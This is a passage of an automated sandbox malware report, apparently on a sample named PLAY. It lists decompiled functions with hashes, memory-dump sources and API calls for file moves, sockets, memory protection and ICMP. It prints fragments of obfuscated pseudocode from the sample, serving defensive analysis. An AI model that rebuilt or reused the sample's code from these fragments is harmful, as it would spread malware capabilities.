          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AllocateHeap_free
          • String ID:
          • API String ID: 614378929-0
          • Opcode ID: f6fe0b80a446683eedb6f8d13d47776d2245641ed821c7d97d41145c954efc2c
          • Instruction ID: ade337ba36be619b88690c66bf92d30b6cfb5714989127cd064794da76fca41b
          • Opcode Fuzzy Hash: f6fe0b80a446683eedb6f8d13d47776d2245641ed821c7d97d41145c954efc2c
          • Instruction Fuzzy Hash: 3F01267260031A6BC321DFA9C882AA9FB99EB05371F100629F645A76C0E7706C00C7A4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE380 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2b0e219dc0067990d1eb20caf48993cfd5801d0bf21c58964a85e12493bed152
          • Instruction ID: 249c6c66a1eab70d5fbc161b5974181fe17c021af47880f02405e30032f6bbaf
          • Opcode Fuzzy Hash: 2b0e219dc0067990d1eb20caf48993cfd5801d0bf21c58964a85e12493bed152
          • Instruction Fuzzy Hash: 17014E72C05145B7DB10BBB55C818DABF79FE55310B90445ED9849B112E1255951C7C1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEEA50 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1266e20a47acaca04c670dc653ddbf5973c237d8c6e95917b7a216fd09701777
          • Instruction ID: 113635f9517081d1304d6762303980e64653ed7c3c0af309e0a20c69d4032886
          • Opcode Fuzzy Hash: 1266e20a47acaca04c670dc653ddbf5973c237d8c6e95917b7a216fd09701777
          • Instruction Fuzzy Hash: BB012472C05145EFCB119FAADD41859BF76FFA1351B14407EEC089B265D3318A25CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEBDFD Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
          Download Yara Rule
          C-Code - Quality: 63%
          			E00AEBDFD(void* __eax, void* __ebx, void* __ecx) {
				int _t14;
				signed char _t24;
				void* _t26;
				signed char _t30;
				signed int _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t42;
				signed int _t44;

				_t26 = __ecx;
				asm("xlatb");
				cs =  *((intOrPtr*)(__ebx - 0x4f2a07f3));
				 *((intOrPtr*)(__eax + __ecx)) =  *((intOrPtr*)(__eax + __ecx)) + __eax + __ecx;
				_t40 =  *(_t44 - 0x3c);
				_t14 = MoveFileW( *(_t44 - 0x28),  *(_t44 - 0x3c)); // executed
				if(_t14 != 0) {
					_push(_t26);
					E00AEE110(__ebx, _t40, _t37, _t40); // executed
					_t35 =  *(_t44 - 0x2c) & 0x0000ffff;
					if(_t35 > 0x67d) {
						_t30 =  *((intOrPtr*)(_t44 - 0x59));
						_t36 = _t35 + 0xfffff983;
						_t24 =  *((intOrPtr*)(_t44 - 0x1d));
						_t42 =  *((intOrPtr*)(_t44 - 0x40));
						do {
							 *((intOrPtr*)(_t44 - 0x24)) =  *((intOrPtr*)(_t44 - 0x24)) - _t42;
							_t30 = (_t30 & 0x000000ff) * (_t24 & 0x000000ff);
							_t36 = _t36 - 1;
						} while (_t36 != 0);
					}
					return E00AF7B30( *(_t44 - 4) ^ _t44);
				} else {
					return E00AF7B30( *(_t44 - 4) ^ _t44);
				}
			}












          0x00aebdfd
          0x00aebdfd
          0x00aebdfe
          0x00aebe08
          0x00aebe0a
          0x00aebe11
          0x00aebe15
          0x00aebe2d
          0x00aebe30
          0x00aebe3b
          0x00aebe44
          0x00aebe46
          0x00aebe49
          0x00aebe4f
          0x00aebe52
          0x00aebe55
          0x00aebe55
          0x00aebe5f
          0x00aebe62
          0x00aebe62
          0x00aebe55
          0x00aebe7c
          0x00aebe17
          0x00aebe2c
          0x00aebe2c

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileMove
          • String ID:
          • API String ID: 3562171763-0
          • Opcode ID: ef7fa4dd6464579bddcd47bba9bfa9fa6c8c26ffb7573ee57287a195af5dc547
          • Instruction ID: cd7157ad74d79a2a52333377395631052afe882470cc23e3aa300842fb2cb61f
          • Opcode Fuzzy Hash: ef7fa4dd6464579bddcd47bba9bfa9fa6c8c26ffb7573ee57287a195af5dc547
          • Instruction Fuzzy Hash: 67012B32F1405857CF149BBDE9602FEB772DF95325F04429BF546AB285DE224C0183D0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE510 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6479911d2a67880c81080c7285c0b4ec1bc07755529ff65161b914f433abfe50
          • Instruction ID: 8f0a34f40f593185ca8c714fe0bfe15ee1024317ececb199a4ffdeced023ae2a
          • Opcode Fuzzy Hash: 6479911d2a67880c81080c7285c0b4ec1bc07755529ff65161b914f433abfe50
          • Instruction Fuzzy Hash: 8001DDB58005859BC311ABB9ED020D6BF38FB62314F400669D9E807242EA272D2EC7F2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEF3A0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 180bc669b8751fe526f5b6c76f23f79768c385940063a1d388d2dddbb6f3a4fb
          • Instruction ID: 021fdcd7bb8ee980d7c30c8284222a181fb7acda97a67f434d5c7136757b732d
          • Opcode Fuzzy Hash: 180bc669b8751fe526f5b6c76f23f79768c385940063a1d388d2dddbb6f3a4fb
          • Instruction Fuzzy Hash: A2F08B53B042C20EE514B6FAAD477E82B54CFB2751F000172F5189E0C1E94248088372
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF3C4E Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E00AF3C4E(void* __eax, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				intOrPtr* _t10;

				_push(ss);
				 *_t10 =  *_t10 + 0x36;
				return __eax;
			}




          0x00af3c51
          0x00af3c59
          0x00af3c5d

          APIs
          • connect.WS2_32(?,?,00000010), ref: 00AF3C7F
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: connect
          • String ID:
          • API String ID: 1959786783-0
          • Opcode ID: 9ef39c9d5c2912ae12dc9e25b4add20b08e853307d3ab2f308fcae47ab76bf64
          • Instruction ID: e1757e069ae3c6b07c5f5291bc533bc58365748dd05cc0b5448a7917f518a8bc
          • Opcode Fuzzy Hash: 9ef39c9d5c2912ae12dc9e25b4add20b08e853307d3ab2f308fcae47ab76bf64
          • Instruction Fuzzy Hash: 2BF0787790020C4BCB04A6B4CD971FDB720EF09361B800325F7229B2C2DA21151B8795
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE9E5 Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 63%
          			E00AEE9E5(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t21;

				asm("into");
				if(_t21 >= _t21) {
					return __eax;
				} else {
					__esi = __esi + 1;
					_push(cs);
					_t1 = __dl;
					__dl =  *__edx;
					 *__edx = _t1;
					asm("movnti [ebx+0x4a], ecx");
					__eax = __eax | __esp;
					_t4 = __edi + 0x392b0342;
					_t5 = __ch;
					__ch =  *_t4;
					 *_t4 = _t5;
					asm("in eax, dx");
					 *__esi = ds;
					asm("cli");
					asm("insb");
					 *(__edx + 0xd8bf661) =  *(__edx + 0xd8bf661) | __cl;
					asm("rcl byte [ebx-0x163eff50], 0x8");
					__eax = __cl & 0x000000ff;
					 *((char*)(__ebp - 0x10)) = 0x41;
					 *((char*)(__ebp - 0xa)) = 0;
					 *((intOrPtr*)(__ebx + 0x8766df8)) =  *((intOrPtr*)(__ebx + 0x8766df8)) + __al;
				}
			}




          0x00aee9e5
          0x00aee9e9
          0x00aee9ab
          0x00aee9eb
          0x00aee9eb
          0x00aee9ec
          0x00aee9ed
          0x00aee9ed
          0x00aee9ed
          0x00aee9f1
          0x00aee9fa
          0x00aee9fc
          0x00aee9fc
          0x00aee9fc
          0x00aee9fc
          0x00aeea02
          0x00aeea03
          0x00aeea05
          0x00aeea06
          0x00aeea07
          0x00aeea0d
          0x00aeea14
          0x00aeea17
          0x00aeea1b
          0x00aeea1e
          0x00aeea1e

          APIs
          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AEEA43
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: ca0e4233e87901b97ed1b0844a694abff1e8ceca3d66f94257b995453c8228ee
          • Instruction ID: d271798a0788379f25a39962e18d25d7bd9ee42b19bea5e9fbf0b1247c4bec9d
          • Opcode Fuzzy Hash: ca0e4233e87901b97ed1b0844a694abff1e8ceca3d66f94257b995453c8228ee
          • Instruction Fuzzy Hash: 5BF04432A081C96ACF229FA8A8447ADBF91FF56224F0002DDE88C9A511C7BB4860C381
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEF322 Relevance: 1.5, APIs: 1, Instructions: 41networkCOMMON
          Download Yara Rule
          APIs
          • socket.WS2_32(00000002,00000001,00000006), ref: 00AEF38B
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: socket
          • String ID:
          • API String ID: 98920635-0
          • Opcode ID: 7a6152ea2e0a377f0b23d385e21cc040d9eeb9678fa6706bb2e05ecb6bccc970
          • Instruction ID: 255f877e7d3bfae1b59fefc398187282530dfe5e043ae2763e16f47ae6820b86
          • Opcode Fuzzy Hash: 7a6152ea2e0a377f0b23d385e21cc040d9eeb9678fa6706bb2e05ecb6bccc970
          • Instruction Fuzzy Hash: 1CF07831A443D91AD7028EB8C8123EAB7F5DFA3308F0411AED9406F2D1C266180A8795
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFC42C Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 95%
          			E00AFC42C(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xb0d568, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00AFB2FF();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00AFA4EC(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00AFE546(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









          0x00afc42c
          0x00afc432
          0x00afc437
          0x00afc445
          0x00afc445
          0x00afc44b
          0x00afc44d
          0x00afc44d
          0x00afc464
          0x00afc46d
          0x00afc475
          0x00000000
          0x00000000
          0x00afc455
          0x00afc457
          0x00afc479
          0x00afc47e
          0x00afc484
          0x00000000
          0x00afc484
          0x00afc45a
          0x00afc45f
          0x00afc460
          0x00afc462
          0x00000000
          0x00000000
          0x00afc462
          0x00000000
          0x00afc464
          0x00afc43d
          0x00afc443
          0x00000000
          0x00000000
          0x00000000

          APIs
          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFC0D5,00000001,00000364,00000002,000000FF,?,00000087,00AFA4F1,00AFC2F4,?,?,00AFB5D2), ref: 00AFC46D
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 01752321ba211d6e3d3a5cede4171dfb8b9fbdbc5e4f98b983d9c1517f78e92c
          • Instruction ID: fc587593e908fdd72f1a5d9286be752fac7cf7ced4522b5de4b35039a97da489
          • Opcode Fuzzy Hash: 01752321ba211d6e3d3a5cede4171dfb8b9fbdbc5e4f98b983d9c1517f78e92c
          • Instruction Fuzzy Hash: 1CF0BE3160022D6ADB31ABE39E2DBBA7758AF617B2B148111BF18E7191DB30DC0186E0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF717E Relevance: 1.5, APIs: 1, Instructions: 38COMMON
          Download Yara Rule
          APIs
          • FindCloseChangeNotification.KERNELBASE(?), ref: 00AF719E
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          • Opcode ID: b010ab29ba097fc54911478be1719dbcedb1422a2200e030ee34e621d316dbc3
          • Instruction ID: 2df44cc49d4612fd4fb00cc798e09a82a512e57d770d0c760ebe858b994becb6
          • Opcode Fuzzy Hash: b010ab29ba097fc54911478be1719dbcedb1422a2200e030ee34e621d316dbc3
          • Instruction Fuzzy Hash: 0CF04C3190808887EB1267B4CC453FD7F229B40355F0402A4E5A21B2E6DA354D89C752
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE1A44 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
          Download Yara Rule
          C-Code - Quality: 56%
          			E00AE1A44(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t8;
				intOrPtr _t20;
				void* _t31;
				signed int _t32;

				_t29 = __esi;
				_t27 = __edi;
				_t16 = __ebx;
				asm("adc al, 0x9e");
				asm("lahf");
				_t32 = _t31 + 1;
				asm("pushfd");
				asm("daa");
				asm("enter 0x1d82, 0x54");
				asm("aas");
				_t20 =  *0xb0d648; // 0xcafce4e7
				_t8 = E00AEDEC0(__ebx, _t20, __edi, __esi);
				 *_t8 =  *_t8 + _t8;
				FindCloseChangeNotification( *(_t32 - 0x1240)); // executed
				_push(_t32 - 0x1220);
				 *((intOrPtr*)(_t32 - 0x1220)) = 0;
				E00AEE9B0(_t32 - 0x1220, __ebx,  *((intOrPtr*)(_t32 - 0x1248)), 0x2bf20, __edi, _t29); // executed
				E00AEE110(__ebx,  *((intOrPtr*)(_t32 - 0x1230)), __edi, _t29); // executed
				E00AEE110(_t16,  *((intOrPtr*)(_t32 - 0x1224)), _t27, _t29); // executed
				return E00AF7B30( *(_t32 - 4) ^ _t32, 0x20);
			}







          0x00ae1a44
          0x00ae1a44
          0x00ae1a44
          0x00ae1a44
          0x00ae1a47
          0x00ae1a48
          0x00ae1a49
          0x00ae1a4a
          0x00ae1a4b
          0x00ae1a4f
          0x00ae1a50
          0x00ae1a56
          0x00ae1a59
          0x00ae1a61
          0x00ae1a6f
          0x00ae1a77
          0x00ae1a81
          0x00ae1a8f
          0x00ae1a9a
          0x00ae1ab7

          APIs
          • FindCloseChangeNotification.KERNELBASE(?), ref: 00AE1A61
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          • Opcode ID: 3df7dc211f9d8cb3800ae03ef1d0b437ff584f83d34cf0f85748c9a26a079572
          • Instruction ID: 5745015c30028bbb2be617d770688267a35a66499c2829472d017930b71b38f6
          • Opcode Fuzzy Hash: 3df7dc211f9d8cb3800ae03ef1d0b437ff584f83d34cf0f85748c9a26a079572
          • Instruction Fuzzy Hash: 7CF0BE31A0001C9BCB10EB94ED52BEEB321EF80344F0005F8F10A97292CE326EE58B89
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE3E7 Relevance: 1.5, APIs: 1, Instructions: 35fileCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          • Opcode ID: 78afbeacacd512190e152ae61067710a640b2eaee862f0c3db7fe5ffb3f11e23
          • Instruction ID: 74d7f70065ce8da54c7d41b6de1cb52e30249beedb301a4b87d8a15f7fd0f414
          • Opcode Fuzzy Hash: 78afbeacacd512190e152ae61067710a640b2eaee862f0c3db7fe5ffb3f11e23
          • Instruction Fuzzy Hash: ECF0E53BA10048ABDF149A9EED216FD3B55EB79730F64C225FB145B2D0D1634D116340
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFC308 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 94%
          			E00AFC308(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00AFA4EC(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xb0d568, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00AFB2FF();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00AFE546(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}







          0x00afc308
          0x00afc30e
          0x00afc314
          0x00afc346
          0x00afc34b
          0x00afc351
          0x00000000
          0x00afc351
          0x00afc318
          0x00afc31a
          0x00afc31a
          0x00afc331
          0x00afc33a
          0x00afc342
          0x00000000
          0x00000000
          0x00afc322
          0x00afc324
          0x00000000
          0x00000000
          0x00afc327
          0x00afc32c
          0x00afc32d
          0x00afc32f
          0x00000000
          0x00000000
          0x00afc32f
          0x00000000

          APIs
          • RtlAllocateHeap.NTDLL(00000000,558B0000,558B0000,?,00AFCD47,00000220,00AFFA61,558B0000,?,?,?,?,00000016,00000000,?,00AFFA61), ref: 00AFC33A
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 1179a40a7abe23a7a62f7575dda94a01cbb24bff222a3790a8507242137eb0eb
          • Instruction ID: 866fd0cc944d7ccbd6876510bd7d48046c1d313d58e416d170237c640af63ec5
          • Opcode Fuzzy Hash: 1179a40a7abe23a7a62f7575dda94a01cbb24bff222a3790a8507242137eb0eb
          • Instruction Fuzzy Hash: 6AE0653150112D5AD6312FEB9E447BAB66D9B513F0F158210BF549B1D1DF61CC0185E5
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEF51C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
          Download Yara Rule
          APIs
          • IcmpSendEcho2.IPHLPAPI(?,00000000,00000000,00000000,?,?,00000020,00000000,?,00000044,000002BC), ref: 00AEF56B
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Echo2IcmpSend
          • String ID:
          • API String ID: 3709281036-0
          • Opcode ID: 8017b4afa12085bfdfb84ff395bb84c0f02e892af1dd47e835b061a7ca498005
          • Instruction ID: 6c8c693c1649b537e126195336afac2ee7a1d76184dc5e8fdb917d01f92f1195
          • Opcode Fuzzy Hash: 8017b4afa12085bfdfb84ff395bb84c0f02e892af1dd47e835b061a7ca498005
          • Instruction Fuzzy Hash: 09F0A731650746BAEF119E849D03BCAB722FB55B04F200195FB486C0E2C3B255219798
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE28A Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
          Download Yara Rule
          C-Code - Quality: 29%
          			E00AEE28A(void* __ebx, signed int __edi, intOrPtr* __esi) {
				void* _t9;
				intOrPtr _t12;
				void* _t17;
				intOrPtr _t19;

				 *(_t17 + 0x58b2447b) =  *(_t17 + 0x58b2447b) ^ __edi;
				_push(0xc1579174);
				asm("out 0x4e, al");
				 *0x2ca82758 =  *0x2ca82758 << 0xca;
				asm("repe mov cl, 0xa8");
				asm("aam 0xfd");
				asm("sbb edx, [eax-0x41]");
				asm("cmc");
				asm("in al, dx");
				 *__esi = _t19;
				asm("insd");
				asm("punpckhbw mm7, [esi-0x7f]");
				_t12 =  *0xb0d618; // 0xcafce5b7
				E00AEDEC0(__ebx, _t12, __edi, __esi);
				_t9 = CreateFileW( *(_t17 - 8),  *(_t17 - 4), 0, 0,  *(_t17 + 0x10),  *(_t17 + 0x14), 0); // executed
				return _t9;
			}







          0x00aee28a
          0x00aee290
          0x00aee295
          0x00aee297
          0x00aee29e
          0x00aee2a1
          0x00aee2a3
          0x00aee2a6
          0x00aee2a7
          0x00aee2a8
          0x00aee2aa
          0x00aee2ab
          0x00aee2af
          0x00aee2b5
          0x00aee2cc
          0x00aee2d4

